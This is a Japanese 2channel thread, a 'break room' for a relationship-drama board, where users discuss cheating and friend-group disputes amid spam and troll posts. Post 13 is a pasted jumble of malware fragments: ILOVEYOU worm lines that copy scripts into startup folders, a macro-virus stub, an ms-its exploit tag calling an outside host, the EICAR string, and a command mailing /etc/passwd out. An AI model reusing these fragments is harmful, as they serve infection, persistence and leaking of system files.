5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆修羅場◆スレ休憩所8

1 :恋人は名無しさん:2006/11/28(火) 16:29:16 ● ?2BP(4658)
◇修羅場◇スレの別室です。
◇修羅場◇から派生した雑談等はこちらへ移動して、スレ速度を落としましょう。

◎わざわざ書いていただいた貴重な体験についての議論・疑問・突っ込み・批判などもこちらでどうぞ

なお、修羅場スレでの書き込みの真偽は不明です。
本当にあった出来事でも、
「再現ドラマ」である以上は書き手による改変や
個人の特定を防ぐための情報の隠蔽などが行われている可能性を常に忘れないように。

■雑談等はお互いに節度を持って行いましょう

本スレ
◇修羅場◇part39
http://love3.2ch.net/test/read.cgi/ex/1163434096/

前スレ
◆修羅場◆スレ休憩所7
http://love3.2ch.net/test/read.cgi/ex/1158765292/

修羅場@避難所
ttp://jbbs.livedoor.jp/bbs/read.cgi/sports/5881/1158199227/

2 :恋人は名無しさん:2006/11/28(火) 16:30:17
otuです

3 :恋人は名無しさん:2006/11/28(火) 16:52:24
>>1
乙です

4 :恋人は名無しさん:2006/11/28(火) 17:00:58
じゃあ、1000まで休憩してよっとσω-`o)オヤスミ

5 :前スレ658:2006/11/28(火) 17:14:29
今、まとめ管理人とメールのやり取りをしている。

また、再開するって。

6 :恋人は名無しさん:2006/11/28(火) 17:41:19
>>1
乙華麗

>>5
本当に658か?トリはどうした?
再開するなら喜ばしいが

7 :恋人は名無しさん:2006/11/28(火) 19:03:00








乙乙

8 :みみ:2006/11/28(火) 19:03:55
みなさんは恋人とのエッチ・自慰に満足してますか??
いろいろ試すようになってから楽しく満足できるようになりました。。

http://www.acport.com/index.cgi?id=1164522107
見てみてください

9 :恋人は名無しさん:2006/11/28(火) 20:55:08
>>5
続報あったらよろしくね

10 :恋人は名無しさん:2006/11/28(火) 23:11:59
過疎ったおかげで、ウイルスコード貼る奴も
来なくなったとさ

11 :恋人は名無しさん:2006/11/28(火) 23:50:40
まとめが悪いと言ったり、またやれと言ったり
忙しいヤツだなあwww
>>658

12 :恋人は名無しさん:2006/11/29(水) 00:25:21
さすがに偽者だろ

13 :恋人は名無しさん:2006/11/29(水) 00:46:22
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

14 :恋人は名無しさん:2006/11/29(水) 00:48:01
最悪

15 :恋人は名無しさん:2006/11/29(水) 01:26:50
あぁ貼られちゃったね…
ウィルスコードほんとウザイね

携帯からだと見るのだるいんだよなぁorz

16 :恋人は名無しさん:2006/11/29(水) 22:51:24






ww

17 :恋人は名無しさん:2006/11/29(水) 23:11:55
話題振ったら速攻かよw
ちょっとワロタ自分にorz

18 :恋人は名無しさん:2006/11/30(木) 03:26:36
ウィルスコード貼ったらどんな罪になるの?
罪状あるなら通報するわw
いい加減うざい

19 :恋人は名無しさん:2006/11/30(木) 07:09:51
罪はないよ

20 :恋人は名無しさん:2006/11/30(木) 11:23:43
IPをチェックされて
書き込み出来なくなるんじゃなかったの?

21 :恋人は名無しさん:2006/11/30(木) 13:02:46
ほんとそうしてくれ
携帯からはひどくてしゃぁない

22 :恋人は名無しさん:2006/11/30(木) 23:58:40
【ゴールデンレス】
  ∩ ・∀・)∩∩ ´∀`)∩  このレスを見た人はコピペでもいいので
   〉     _ノ 〉     _ノ10分以内に3つのスレへ貼り付けてください。
  ノ ノ  ノ  ノ ノ  ノそうすれば14日後好きな人から告白されるわ宝くじは当たるわ
  し´(_)   し´(_) 出世しまくるわ体の悪い所全部治るわでえらい事です


23 :恋人は名無しさん:2006/12/01(金) 14:03:03
ちょっとスレ違なんですが聞いてください、ある日友人A♂から
電話がかかってきて
A♂「ちょっと話さなきゃいけないことがある、
これ話したらおれ絶対お前に嫌われると思うけど覚悟して言うわ」
自分は何事かとドキドキしながら話の内容を聞くと
A♂「お前の友達のB♀とヤッちまった」
B♀は元々自分の友達でA♂や他の友達にも紹介してみんなで遊ぶような
仲になったんです。
自分はB♀にはは元々友達感情しかなかったのでA♂に「なんだそんな事
かよ、俺はB♀の事友達としか思ってないしなんとも思わねーよ、まぁ
グダグダにならない程度にしろよw」と言った所A♂が返してきた答えは
A♂「そうなのか?俺お前がてっきりB♀の事好きだと思ってたからよ、
悪いなぁとは思いつつ何回かヤッてたんだわ」
それを聞いた自分はその場では「・・・いいよ気にすんなよ、またな。」
とそこで電話を切って話しは終わったのですが。

この話で自分が腑に落ちないのはA♂は自分がB♀の事を好きだと思ってる
のにB♀とセクスしてた事で、もしその時自分がB♀の事好きだったとしたら
俺はどういう気持ちだったんだろう、てな感じでいろんな事を
考えてしまいました。自分はB♀の事が好きだった訳ではないのでA♂に対し
怒りはないのですが、今回の事でかなり不信感が出てきました、もうA♂とは
縁を切ろうかと思っています。
 
みなさんが自分と同じ立場になった時どう思うか聞かせてください。

24 :恋人は名無しさん:2006/12/01(金) 14:19:44
>>23
A♂は言わなきゃいい事を言ったんだね。
でも確かにスレ違い。板違い?

25 :恋人は名無しさん:2006/12/01(金) 14:50:23
それは不信感あるな。
いずれ友人の彼女とでも寝るようになるだろうから縁を切るね。

26 :23:2006/12/01(金) 15:44:03
この話には続きがあるんですがどこの板に行けばいいですかね?
生活全般板の 友達やめるときスレ に行けばいいのかな?
ここで最後まで投下していいですかね?

27 :恋人は名無しさん:2006/12/01(金) 16:57:33
>>26
折角だから最後までヨロ。

28 :恋人は名無しさん:2006/12/01(金) 17:00:25
>23
ここで、いいんじゃないか。

29 :23:2006/12/01(金) 19:22:47
話が長くなるので今日・明日でまとめて今と同じぐらいの時間に投下します。
しばしまっててくださいな

30 :恋人は名無しさん:2006/12/01(金) 22:44:45
コピペですが続報待ち

“***** 私は見た!! 不幸な結婚式 26 ***** ”
http://life7.2ch.net/test/read.cgi/sousai/1164627057/37
37 愛と死の名無しさん sage New! 2006/11/29(水) 20:28:30
先月に行った式はかなりだった。
新郎(24)はちょっと前に2年位付き合ってた同い年の彼女とケンカした。
かわいくて、会社の中でも男女問わず「いい子だよね」と評判の子。
社内の子ではないけど、会社イベントでも一緒に来てて、
来ないと「彼女さんは?」と聞かれる位好かれてた。
本当にいい人だったし、しかも凄くかわいかったし、
二人の会話はちょっとした夫婦漫才状態、ノリが良くて楽しかった。
が、何の気の迷いかケンカした時に社内の
「獅子舞」(34)とあだ名される女と浮気。
由来はちょっとした事でも怒り狂い、獅子舞のように髪を振り乱して叫ぶ所。
その一夜の過ちで獅子舞が妊娠、
責任を取る形で結婚になった。



31 :恋人は名無しさん:2006/12/01(金) 22:48:06
>>30の続き

ホクホクの新婦側、何だか黙り込んでる新郎側。
満面の笑顔の獅子舞、何だか気の抜けたような顔の新郎、
しかも「誓いのキス」で、(´Э`)ブチュウと待つ新婦の顔をじっと見て
覚悟を決めて頬に軽くチュッ。
ブーケトスでははしゃぐ獅子舞を放置で出席者に挨拶してた。
新婦友人は2人のみ、しかもすっぴんで悪いけど変な服、
大変申し訳ないが不細工で、その二人の席の周りにどんよりとした空気があった。
2次会もなし(新郎が拒否した)、事情を知らないと思われる客が
「何か変な雰囲気だね」と話していたほど。
だけど一番不幸なのは、実は獅子舞は妊娠していないようだと言う事。
彼女とケンカ→やけ酒→獅子舞に確保される、
の流れで、本当は、もしかしたらだけど、体の関係はなかったのかも、と噂。
獅子舞は寿退職したけど、新郎は
「これから調停です」と言ってた。
申し訳ない、必ず御祝儀はお返しいたします、と手紙が皆に届いた。
今日、会社の外に出た時に、獅子舞と獅子舞クローン母とちいちゃいおじさんとすれ違った。
きっと会社を交えての話し合いになったんだろうな。

32 :恋人は名無しさん:2006/12/02(土) 00:42:54
一夜の過ちの変な女に妊娠告げられたからって動揺しすぎだな。
診断書もってきて、くらい思いつかないのかねヘタレは。
ちゃんと確認しなきゃ!

33 :恋人は名無しさん:2006/12/02(土) 03:03:21
>>23
友人関係を続けるとしても、
Aには彼女や片思いの女性を紹介できない罠。





そこで片思いの男性を紹介してあげてはどうだろうほ

34 :恋人は名無しさん:2006/12/02(土) 04:32:11
>>23
Aは友達の好きな女を寝取ることに背徳的な快感を覚える寝取りスキーか
理性ではやめようと思っても欲望が勝るという典型的なサルなのか。

これで実は誘ったのはBのほうからだったというなら笑うが。

35 :23:2006/12/02(土) 10:10:36
 続きを投下する前に余談なんですが元々自分とA♀の出会いはコンパで
実は自分もA♀と今回の事件が発覚するまでは何回かセクスをしていました、
 言葉では出しませんでしたが最初に誘ってきたのはA♀の方からで、その後は
ずっと自分から誘っていました。自分は初めてA♀とセクスする時に、前もって
「俺は割り切って付き合いたい、お互いに彼氏・彼女が出来きた時にこの関係は
終わらせて普通の友達になれればいいんじゃないか?」
と伝えお互い同意の上でセクスをしていました。ですがお互い気が合う事も
ありセクス梨でも飲みに行ったりしていたので今回の事件が終わった今では
事件前よりも仲のいいの友達関係になれました、もちろん今はセクスなしの
関係です。
この事も照らし合わせてこれからの話を聞いてください。

36 :恋人は名無しさん:2006/12/02(土) 10:22:01
wktk

37 :恋人は名無しさん:2006/12/02(土) 10:23:53
>>35
B♀なのかA♀なのかはっきり汁

38 :23:2006/12/02(土) 10:45:18
すいません、Aが男でBが女です。35のレスは自分とBの馴れ初めです、
メモ帳全部手直しなきゃならんなorz

39 :23:2006/12/02(土) 10:52:35
では本題に入ります、登場人物が増えるので今のうちに説明します。
     自分♂        A♂→自分の地元の友達 
     B♀→コンパで知り合った友達   C♀→B♀の友達

A♂にB♀とヤっちまったと告白されたとき
自分はA♂に念を押して「セクスするのは全然構わないけどB♀が後で泣いたり
俺たちグループ全体の友情関係にヒビが入るような事だけはしないでくれ」
と言いA♀は「大丈夫、いつも誘ってくるのはB♀の方だし、俺はB♀にはC♀の事が
好きだと言ってある、だからお互い割り切って楽しんでいるだけだ、そして
C♀にも俺はB♀とセクスしている事も伝えてある。」
と言うので自分も頭の中では???なんでわざわざC♀にそんなこと言うんだ?
と思いながらも安心していました。
 電話を切ったあとA♂から聞いた話を自分なりにまとめ出た答えは、B♀はきっと
A♂の事が好きで自分とセクスするのはもう辞めたいけど断れない性格なので
自分から言い出せないだけなんだろう、このままじゃ俺が友人関係にヒビを入れて
しまうのではないかと思い、それならそうなる前に自分から切り出そうとB♀の所に
行き「A♀から話は聞いた、B♂の気持ちに気付かなくて本当に悪かった俺はもうB♂
の事誘ったりしない、これからは普通の友達になろう。」と言うとB♂は
「確かに私はA♀の事好き、でもあなたからの誘いを断ると友達関係が終わって
しまうと思いそれが怖くて言い出せなかった、だから私も悪いし気にしないで。」
やっぱりそうだったかと思ったのですがここでまた疑問がでてきました。
B♂に「一応確認するけどA♂がC♀の事が好きなのは本人から聞いてるんだろ?」
と言うと「・・・何それA♂は私にはCの事は好きじゃない、あれは社交辞令みたいな
もんだって言ってたしいつも誘ってくるのはA♂の方からよ」
自分「・・・・A♂ダメポ」

続きます

40 :恋人は名無しさん:2006/12/02(土) 11:04:18
君たちのグループとは関わりたくないなwww
Cはどうかわからんが

それと、♂♀の間違いが多すぎてもう・・・

41 :23:2006/12/02(土) 11:09:12
ホントだまだ間違ってるしwww ゴメヌorz 

修正しました↓

A♂にB♀とヤっちまったと告白されたとき
自分はA♂に念を押して「セクスするのは全然構わないけどB♀が後で泣いたり
俺たちグループ全体の友情関係にヒビが入るような事だけはしないでくれ」
と言いA♀は「大丈夫、いつも誘ってくるのはB♀の方だし、俺はB♀にはC♀の事が
好きだと言ってある、だからお互い割り切って楽しんでいるだけだ、そして
C♀にも俺はB♀とセクスしている事も伝えてある。」
と言うので自分も頭の中では???なんでわざわざC♀にそんなこと言うんだ?
と思いながらも安心していました。
 電話を切ったあとA♂から聞いた話を自分なりにまとめ出た答えは、B♀はきっと
A♂の事が好きで自分とセクスするのはもう辞めたいけど断れない性格なので
自分から言い出せないだけなんだろう、このままじゃ俺が友人関係にヒビを入れて
しまうのではないかと思い、それならそうなる前に自分から切り出そうとB♀の所に
行き「A♂から話は聞いた、B♀の気持ちに気付かなくて本当に悪かった俺はもうB♀
の事誘ったりしない、これからは普通の友達になろう。」と言うとB♀は
「確かに私はA♂の事好き、でもあなたからの誘いを断ると友達関係が終わって
しまうと思いそれが怖くて言い出せなかった、だから私も悪いし気にしないで。」
やっぱりそうだったかと思ったのですがここでまた疑問がでてきました。
B♀に「一応確認するけどA♂がC♀の事が好きなのは本人から聞いてるんだろ?」
と言うと「・・・何それA♂は私にはC♀の事は好きじゃない、あれは社交辞令みたいな
もんだって言ってたしいつも誘ってくるのはA♂の方からよ」
自分「・・・・A♂ダメポ」

続きます

42 :23:2006/12/02(土) 11:35:51
 B♀は立て続けにこう言いました「それにC♀に「あんたアイツ(俺)と
ヤッってるんでしょ?A♂から聞いたよ」って言われたの」
 自分はA♂が言っている事とB♀が言っていることが全然違うので
頭の中が???状態になりました、そこでB♀に「A♂から聞いた事と
C♀から聞いたことを詳しく聞かせてくれ」と言い自分がA♂から聞いた話も
含め全ての話をつなげるとトラブルの根元はA♂にあるようでまとめた
話はこうなります。
         B♀→A♂→C♀→自分

上の構図を説明するとB♀はA♂の事が好きで、A♂はC♀の事が好きで
C♀は自分の事が好きだったようで、Cが自分のことを好きなのが気に
入らないA♂はC♀に自分のことを悪く言って嫌いにさせようとしていた
ようなのです。A♂はC♀にB♀とセクスしたなんて事は本当は言ってお
らず、自分とB♀の関係を話していたようなのです。その間にもA♂は
B♀の気持ちを利用してしっかりセクスはしていたそうです。
A♂は無謀にも自分とB♀とC♀の3人を同時に騙そうとしていたよう
なのですがここまで話が噛みあわないとすぐ嘘はバレてしまったのです。

続きます 

43 :恋人は名無しさん:2006/12/02(土) 11:43:23
いったん、メモ帳でもワードでも、書き上げて推敲してから投下してくれないかな?
記号だらけで読みづらい上に、間違えてるんじゃ意味がない。

44 :23:2006/12/02(土) 12:52:05
 A男は元々トラブルを起こしやすくこれ以上話をこじらせて暴走すると更に
厄介になると思ったのでB子と話会った結果A男には嘘が全てバレていることは
黙っておいて自分達はまだ騙されていることにしよう、そしてそのままコイツ
とはもう縁を切ろうということになりました。
そこでまた新たな火種が出てきたのですが、A男から自分とB子の関係を聞いた
C美が怒り、今度はC美が自分とB子の間に入ってきました。
 B子と自分が仲良くしている事を気にいらないC美はB子に自分の事を悪く
言って嫌いにさせようとしていたようなのです。C美までA男と同じような事を
してきて自分とB子は唖然としていました。それにC美には彼氏がいるので
こんなことする筋合いはないはずなのです。自分はC美とはそんなに仲良く
なかったのですぐに関わるのを辞めることを決めましたがB子は友達なので
心配だったのですがB子もこれからはC美とは距離を置いて付き合っていく
ということで今回の話は終わりました。
 
 自分とB子がサバサバしていた事とA男とC美の粘着な性格が仇になったのかと
思ってるんですが、この事についてのみなさんの意見を聞かせてもらえませんか?
 自分は何も悪いことはしていないと思っているのでダメ出しなんかあれば
おねがいします。


45 :恋人は名無しさん:2006/12/02(土) 13:27:22
好きにすれば?
としか言いようがない

あえて言うならば
おまいがC美とやって、修羅場をおこしてくれ

46 :恋人は名無しさん:2006/12/02(土) 13:34:25
セフレ出来る感覚が分からないよ。
ちゃんと付き合ってからエッチするようにしたら?
誰も誠意ある男女関係を築こうとしない仲間うちでは
相談されても馬鹿らしい

47 :恋人は名無しさん:2006/12/02(土) 15:10:43
「類は友を呼ぶ」

何故か俺の頭に突然浮かんだ。何故かはわからん。

48 :恋人は名無しさん:2006/12/02(土) 15:19:44
そもそもそれって「友だち」と言えるつきあいなのか。
友だちならセクースしないし足引っ張ったり
嫌がらせなんぞしないだろう。

49 :23:2006/12/02(土) 15:48:09
 確かにB子とはセクスしなくなった今の方が仲良くなれた気がします。
今回のトラブルでお互いに恋愛感情が少しもない事も再確認できたし
これはこれで良かったなと思ってます。

 A男は昔はトラブルメーカーで過去に友達から干されて
いたこともありました、友人達とみんなで飲みに行く時に自分が
「A男も呼ぼう」と言っても周りは嫌な顔をしていたのですが
もう今いい大人なんだし落ち着いているだろう、こちらがしっかり
歩み寄り「トラブルは起こさないでくれ」と感情で訴えかければ
トラブルなんて起こさないはずだと思っていたんです。
 今回のA男の事を他の友人に話したら「ほらみろ、言わんこっちゃない」
という感じだったのでやっぱりコイツは無理なんだなと思いました。
 


50 :恋人は名無しさん:2006/12/02(土) 16:03:54
もし他の友人に23とB子がセフレだったことも話していれば、
A男に対する反応と同じ反応が23にも返ってくるだろうよ

皆にA男とC美を叩いて欲しいんだろうが、無理だから諦めろ
はっきり言って23もB子もA男と同レベル
頭と下半身がゆるゆるのDQN同士仲良くしときゃいーじゃん

51 :恋人は名無しさん:2006/12/02(土) 16:21:32
DQNのいがみ合いって本当にくだらんな。
勝手にやってろ。

52 :恋人は名無しさん:2006/12/02(土) 16:40:55
…一日引っ張った揚句ナンダソレ。
目糞鼻糞とはこのことか。

53 :恋人は名無しさん:2006/12/02(土) 18:09:29
サークルってスーフ(ry

54 :恋人は名無しさん:2006/12/02(土) 21:30:01
仲良く友情ごっこでもして、性病も貰い合ってればいいと思うよwww

55 :恋人は名無しさん:2006/12/03(日) 00:41:47
萌えコピにまた早漏転載厨が寄生したので、このスレ終わらせましょう。

投下の邪魔も致します。

56 :恋人は名無しさん:2006/12/03(日) 00:53:13
>>55
犯人?

57 :恋人は名無しさん:2006/12/03(日) 01:15:48
萌えコピなんぞどうなってもいいような

58 :恋人は名無しさん:2006/12/03(日) 06:58:03
>>55が前スレ>>658を苦しめた犯人ということ?

59 :55:2006/12/03(日) 10:02:28
レスのしかたが悪かったな。転載厨じゃないよ。
前スレ>658でもない。

転載厨が駄作も萌えコピに貼るので頭にきてるんだ。

なので、すまんが修羅場スレの邪魔をさせてもらうよ。

60 :恋人は名無しさん:2006/12/03(日) 10:16:47
つまり嵐と

61 :恋人は名無しさん:2006/12/03(日) 14:32:58
それに頭も弱いと

62 :恋人は名無しさん:2006/12/03(日) 18:36:13





なんつー人物が読みにくい話だ


♀♂
こんなの使わずに適当な男性名、女性名でやればいいのに

63 :恋人は名無しさん:2006/12/03(日) 21:42:50
後先考えずに盛ってて羨ましい事だ

B子みたいに頼めばOKってガキは凄いな。

俺は慎重に慎重にしてるから修羅場にならんが数はこなせないね

64 :恋人は名無しさん:2006/12/04(月) 01:08:18
>>55=59
本末転倒って言葉知ってるか?

65 :恋人は名無しさん:2006/12/04(月) 01:53:06
>>64
知ってればあんなネ申のごとき尊大な発言が出来るわけもないと思うが。
>>23
で、それのどこが修羅場?
いっそ乱交でもすれば?

66 :恋人は名無しさん:2006/12/04(月) 01:53:26
まぁ萌えコピを荒らす度胸が無いから修羅場スレを荒らすお!!

ってとこだろ

67 :55:2006/12/05(火) 14:28:17
いや、萌えコピにくだらさい修羅場スレはいらないから元を正そうかと。

68 :恋人は名無しさん:2006/12/05(火) 14:47:51
〇          )\ ハァ、ヤレヤレ
   O     <⌒ヽ ヽ  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     o   ( ´ー`) < くだらさい。実にくだらさい
     ┗─^V(   丿V^\_______________
          ヽ (
            )  )
           ノ ノ
           レ′

69 :恋人は名無しさん:2006/12/05(火) 14:58:13
そーれ!うんこしちゃうぞ?ぶりっとしちゃうぞ?
マジで、三日分のくっさぁーい!奴を垂れるぞ
いいのか?いいのがっ!おいっ!!
糞しまくるぜ!ぶりばりかましたるぜぇぜぇぃえー!
ほーら、臭いだろう?柔らかビチビチうんこだぞぉ

喰らえ!!!!

70 :恋人は名無しさん:2006/12/05(火) 15:07:04
>>67
そんな事より、まずお前は職を探せ

71 :恋人は名無しさん:2006/12/05(火) 16:19:01
そーれ!うんこしちゃうぞ?ぶりっとしちゃうぞ?
マジで、三日分のくっさぁーい!奴を垂れるぞ
いいのか?いいのがっ!おいっ!!
糞しまくるぜ!ぶりばりかましたるぜぇぜぇぃえー!
ほーら、臭いだろう?柔らかビチビチうんこだぞぉ

喰らえ!!!!

72 :恋人は名無しさん:2006/12/05(火) 16:26:04
絶叫悶絶脱糞阿鼻叫喚♪
素敵なアナルさぁ♪
絶叫悶絶脱糞阿鼻叫喚♪
君のアナルもギミ☆ギミ☆
〜台詞〜

うんこ漏らした。

絶叫悶絶脱糞阿鼻叫喚♪

73 :恋人は名無しさん:2006/12/05(火) 16:29:13
>>67
元を正すって、こんな幼稚な荒し方の事なのか?

74 :恋人は名無しさん:2006/12/05(火) 16:57:24
こーゆー荒らしの方がイラつくな。
糞レスを単発で行うのが。
“脱糞”してしまうぜ?

75 :恋人は名無しさん:2006/12/05(火) 17:29:10
まとめ再開してあげてもいいよ

76 :恋人は名無しさん:2006/12/05(火) 17:32:21
>>75
俺の細回線で立ち上げるから、ログくりょ

77 :前スレ658:2006/12/05(火) 17:35:43
>>75
待 っ て ま し た 。

78 :見て肛門:2006/12/05(火) 17:39:38
>75
>77
こいつ同一だぜ?

脱糞してしまいそうだぜぇ

79 :恋人は名無しさん:2006/12/06(水) 15:50:36
本スレ221は
続き書いてくれるかな?
三次会で2ちゃんという状況が
イマイチ分かんない。

>>75
偽者でも本人でも
カキコしたんだから
よろしく

80 :恋人は名無しさん:2006/12/06(水) 23:12:10






---------------------------------------

いったん〆

81 :魔少年D.T ◆aTTIDOUTeI :2006/12/07(木) 12:11:08
221あんた最高や!男の中の男やぁ!!

82 :恋人は名無しさん:2006/12/07(木) 19:18:30
セブンに帰れ

83 :恋人は名無しさん:2006/12/08(金) 14:21:37
セブンって何?

84 :恋人は名無しさん:2006/12/08(金) 15:09:59
ウルトラ、エウレカ

85 :恋人は名無しさん:2006/12/09(土) 07:54:57
らっきょたべたいとおもってました。
たべてもいいですか?
たべてもいいですか?

86 :恋人は名無しさん:2006/12/09(土) 07:55:50
で、どこを縦読みするんだぜ?

87 :恋人は名無しさん:2006/12/09(土) 08:58:54
>ら
>た
>た

ホンダのロードパルですな、懐かしい。

88 :恋人は名無しさん:2006/12/09(土) 21:39:35



原爆成人



なにそれ?

89 :恋人は名無しさん:2006/12/13(水) 01:09:11
保守

90 :恋人は名無しさん:2006/12/15(金) 13:38:00
保守

91 :恋人は名無しさん:2006/12/17(日) 22:29:22
あげ

92 :恋人は名無しさん:2006/12/22(金) 21:43:56
あげ

93 :ミート(*^3^) ◆fedyBSBx0I :2006/12/22(金) 21:44:29 ?2BP(0)
                 / /_________________________
                 / / __     __        n     _____    /
                 / / |   |     /  /      / /    /       |   /
                / /  |   |    /  /      / /   . /        .|   /
               / /  |   |.   /  /    /⌒ヽ/     /   / ̄ ̄|  l  /
         .      / / . |   |  /  /    ( ^ω^ )     /   /.  / /  /
  .          . / ./   |   |  /  /     ノ/ /  ノ   /    ̄ ̄ /  . /
             / /  . |   |. /  /   // / ノ     /   / ̄ ̄ ̄ .   /
             / /    |   |/  /  ⊂( し'./    /   /         /
            / /     |     /     | ノ'     . /   /         /
            / /     |    /.     し'      ./   /        /
           / /      ̄ ̄ ̄              ̄ ̄         ./
           / /_______________________/
   /⌒ヽ    (  ̄)
  ( ^ω^) / /
/⌒  _ / /./
 \    //_/\
    ̄ ̄ ̄(_二_)

カップル板はVIPが占領しますた


94 :恋人は名無しさん:2006/12/26(火) 22:09:53 ID:W+ezMzwjO
テスト

95 :「&rf&rusi&ran&ran&ran:2006/12/26(火) 22:19:35 ID:W+ezMzwjO
テスト

96 :恋人は名無しさん:2007/01/01(月) 15:23:30 ID:ICEbouPHO
あけおめ


97 :恋人は名無しさん:2007/01/03(水) 02:59:53 ID:r7wqMpR70
あげるなよ。このスレいらないんだよ。
前スレで不必要だったら自然にdat落ちするだろうという話だったろう。

98 :343:2007/01/03(水) 16:52:22 ID:R0+EnN22O
元カノの親父に呼び出された343というものです
たいしたことのない後日談ですが投下してみます

初詣に行ったら元カノの両親に出会ってしまった
親父さんに大分謝られてしまったよ
その場に身内がいたからネタにされてます


99 :恋人は名無しさん:2007/01/03(水) 21:56:06 ID:kwAmjoFC0
いまさらだが

kwsk!

100 :恋人は名無しさん:2007/01/03(水) 22:59:24 ID:R0+EnN22O
親父さんからは
娘が酷いことした&呼び出したことについて謝られた
こっちも失礼な事を言ってしまいました
&親が娘の事を大事に思うのは当然では?と返事
ちなみに身内ってのは弟、妹、従兄妹。
入院した親父、見舞いにきたおかん、叔父さん叔母さんに変わって俺が引率役だった
会話中に妹が空気を読まずに「兄貴は振られたんじゃないの」
と話に加わってきたが
奥さんが「娘がちょっとね、お兄さんならいい人が見つかるよ」とフォローしてくれた
親はいい人なんだよなぁというのを再認識した

終わったことだしネタにされたくなかったから口止め料を足して
お年玉を奮発したのに妹がおかんに話やがって色々聞いてくるのがウザい


101 :恋人は名無しさん:2007/01/03(水) 23:35:48 ID:jRSOezkz0
>>100
乙です。

102 :恋人は名無しさん:2007/01/05(金) 01:12:27 ID:6RCQcPGI0
408の話見てると
ttp://moemoe.homeip.net/view.php/4660
を思い出した

408も最終的には幸せになってほしいよ・・・

103 :恋人は名無しさん:2007/01/06(土) 01:30:04 ID:r5qAMCom0
408があんまり悲惨なんでむしろネタであって欲しいとすら思う。

104 :恋人は名無しさん:2007/01/06(土) 01:38:50 ID:r5qAMCom0
あ、続きあったのか。

105 :恋人は名無しさん:2007/01/06(土) 01:43:15 ID:9VJJicyW0
正直、>>437の時点で釣りかと思ったが、マジだったみたいだな。

106 :恋人は名無しさん:2007/01/06(土) 01:49:59 ID:VxJxnO7f0
>>105
そうか?
むしろ今のほうがネタ臭くなってきたんだが

107 :恋人は名無しさん:2007/01/06(土) 01:52:43 ID:oBP6N1Wi0
数万の貸した金はEの堕胎費用になったとみた。

108 :恋人は名無しさん:2007/01/06(土) 01:55:41 ID:9VJJicyW0
>>106
あのエロ描写が何とも胡散臭くて違和感を覚えたんだが、そうでもないのかな。

109 :恋人は名無しさん:2007/01/06(土) 01:57:33 ID:xr4b9wnE0
早くオチつけてくれないかな
過剰なエロ描写はネタ臭さ満載だ

110 :恋人は名無しさん:2007/01/06(土) 02:12:14 ID:r5qAMCom0
プロポーズ寸前に相手の正体が分かったってのは
運が良かったんじゃないかなあ。


111 :恋人は名無しさん:2007/01/06(土) 02:14:21 ID:9VJJicyW0
うん、そう思う。あと一歩で地獄へ踏み込む寸前で助かったって感じ。

112 :恋人は名無しさん:2007/01/06(土) 02:14:24 ID:OFTS7bnL0
まぁある意味サンタからのプレゼント、辛いプレゼントだが
人生は助かった。

113 :恋人は名無しさん:2007/01/06(土) 06:51:09 ID:hnPozsy/0
クリスマスイブとか結婚式当日とかに浮気する奴の頭の中身がわからん。

114 :恋人は名無しさん:2007/01/06(土) 08:43:21 ID:k5Hb+DWf0
休憩所あるの忘れてた。わざわざ本スレに書かないで
こっちに普通に書いとけばよかったな。

115 :恋人は名無しさん:2007/01/06(土) 09:49:59 ID:skdDyahj0
>>113
結婚前の「最後の思い出作り」
スリルと背徳感によって通常以上の興奮と快楽を手にする事が出来ます

バレタ時の代償も通常の3倍くらいになりますけど

116 :恋人は名無しさん:2007/01/06(土) 13:36:59 ID:mI51hTwg0
シャア並だな。

117 :恋人は名無しさん:2007/01/06(土) 19:51:18 ID:2+ilWEA9O
本スレ408の文章、
なんかえっちねたにいたうにっていうねた師とそっくりだね。
前にもあったが。

118 :恋人は名無しさん:2007/01/06(土) 23:26:21 ID:QXXkywZH0
うにだったら、きっと復縁してLとのセクロス報告させて鬱勃起ENDになるはずw

119 :恋人は名無しさん:2007/01/07(日) 00:48:43 ID:KFpuF0CoO
>>118
あるあるwwww

120 :恋人は名無しさん:2007/01/08(月) 09:49:07 ID:NQdYrh/SO
本スレ408、408が寝室にい
ることにも出ていったこと
にもEとLが気付かなかった
のがどうも釈然としない。
ダブルベッド入るくらいだ
し寝室が広いんだろうか、
それともセクースを始める
と多少の物音には気づかな
いものなんだろうか……と
考えてしまった。

121 :恋人は名無しさん:2007/01/08(月) 10:16:24 ID:DtEUbAnJ0
>>120
まあ人によりけりだろうね
俺は神経質なので、ドアの開く音で目覚ますけど

122 :恋人は名無しさん:2007/01/08(月) 19:33:37 ID:C3h/bP740
>>118
そういう展開じゃないネタも結構書いてるぞ。
つか続報さっぱりこないけど図星だったのか?

